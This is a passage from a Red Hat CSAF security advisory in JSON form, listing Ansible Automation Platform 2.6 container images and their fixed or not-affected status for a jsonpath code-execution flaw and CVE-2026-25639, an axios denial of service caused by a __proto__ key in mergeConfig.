"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
